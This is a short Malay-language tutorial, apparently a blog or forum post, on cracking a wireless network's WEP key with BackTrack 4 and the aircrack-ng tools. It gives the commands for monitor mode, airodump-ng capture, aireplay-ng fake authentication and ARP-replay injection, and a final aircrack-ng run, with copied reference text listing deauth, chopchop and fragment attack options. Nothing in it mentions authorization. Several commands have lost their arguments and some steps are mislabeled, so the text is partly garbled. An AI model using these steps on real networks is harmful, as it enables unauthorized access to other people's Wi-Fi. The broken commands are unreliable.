Ini adalah cara2 bagaimana nak dapatkan wireless wep key

Download dan burn Backtrack 4



Lepas boot, pilih optional yang atas sekali

Command : startx (untuk masuk os backtrack)

masuk Terminal dan lakukan step2 seperti dibawah :

Objective : To list all wireless interface
Command : #iwconfig

Objective : To identify which interface is up (active)
Command : #ifconfig



Objective : To identify what chipset & driver in used
Command : #airmon-ng

Objective : To activate / start the interface
Command : #airmon-ng start wlan0




Objective : To list all available wireless router / switch & client’s mac address
Command : #airodump-ng wlan0




---------------------------------------------------------------------------------

Decsription :

BSSID : MAC address of the access point. In the Client section, a BSSID of ”(not associated)” means that the client is not associated with any AP. In this unassociated state, it is searching for an AP to connect with.

PWR : Signal level reported by the card. Its signification depends on the driver, but as the signal gets higher you get closer to the AP or the station. If the BSSID PWR is -1, then the driver doesn't support signal level reporting. If the PWR is -1 for a limited number of stations then this is for a packet which came from the AP to the client but the client transmissions are out of range for your card. Meaning you are hearing only 1/2 of the communication. If all clients have PWR as -1 then the driver doesn't support signal level reporting.

RXQ : Receive Quality as measured by the percentage of packets (management and data frames) successfully received over the last 10 seconds. See note below for a more detailed explanation.

Beacons : Number of announcements packets sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.

# Data : Number of captured data packets (if WEP, unique IV count), including data broadcast packets.

#/s : Number of data packets per second measure over the last 10 seconds.

CH : Channel number (taken from beacon packets).Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.

MB : Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g. The dot (after 54 above) indicates short preamble is supported.

ENC : Encryption algorithm in use. OPN = no encryption,”WEP?” = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP is present.

CIPHER : The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2. WEP40 is displayed when the key index is greater then 0. The standard states that the index can be 0-3 for 40bit and should be 0 for 104 bit.

AUTH : The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP).

ESSID : The so-called “SSID”, which can be empty if SSID hiding is activated. In this case, airodump-ng will try to recover the SSID from probe responses and association requests.

STATION : MAC address of each associated station or stations searching for an AP to connect with. Clients not currently associated with an AP have a BSSID of ”(not associated)”.

Lost : The number of data packets lost over the last 10 seconds based on the sequence number. See note below for a more detailed explanation.

Packets : The number of data packets sent by the client.

Probes : The ESSIDs probed by the client. These are the networks the client is trying to connect to if it is not currently connected.

---------------------------------------------------------------------------------

Objective : To select specific Encryption you want to encrypt
Command : #airodump-ng –bssid -c -w



Objective : To generate traffic
Command : #aireplay-ng -1 0 –a



Objective : To generate traffic
Command : #aireplay-ng -3 –b



Description:

Filter options:
 -b bssid : MAC address, Access Point
 -d dmac : MAC address, Destination
 -s smac : MAC address, Source
 -m len : minimum packet length
 -n len : maximum packet length
 -u type : frame control, type field
 -v subt : frame control, subtype field
 -t tods : frame control, To DS bit
 -f fromds : frame control, From DS bit
 -w iswep : frame control, WEP bit

Replay options:
 -x nbpps : number of packets per second
 -p fctrl : set frame control word (hex)
 -a bssid : set Access Point MAC address
 -c dmac : set Destination MAC address
 -h smac : set Source MAC address
 -e essid : fakeauth attack : set target AP SSID
 -j : arpreplay attack : inject FromDS pkts
 -g value : change ring buffer size (default: 8)
 -k IP : set destination IP in fragments
 -l IP : set source IP in fragments
 -o npckts : number of packets per burst (-1)
 -q sec : seconds between keep-alives (-1)
 -y prga : keystream for shared key auth

Attack modes (Numbers can still be used):
 -deauth count : deauthenticate 1 or all stations (-0)
 -fakeauth delay : fake authentication with AP (-1)
 -interactive : interactive frame selection (-2)
 -arpreplay : standard ARP-request replay (-3)
 -chopchop : decrypt/chopchop WEP packet (-4)
 -fragment : generates valid keystream (-5)
 -Caffe-latte : Caffe-latte attack (-6)
 -cfrag : Client-oriented fragmentation attack (-7)
 -test : injection test (-9)


Objective : To generate traffic
Command : #aircrack-ng .cap




~~Are_Mean~~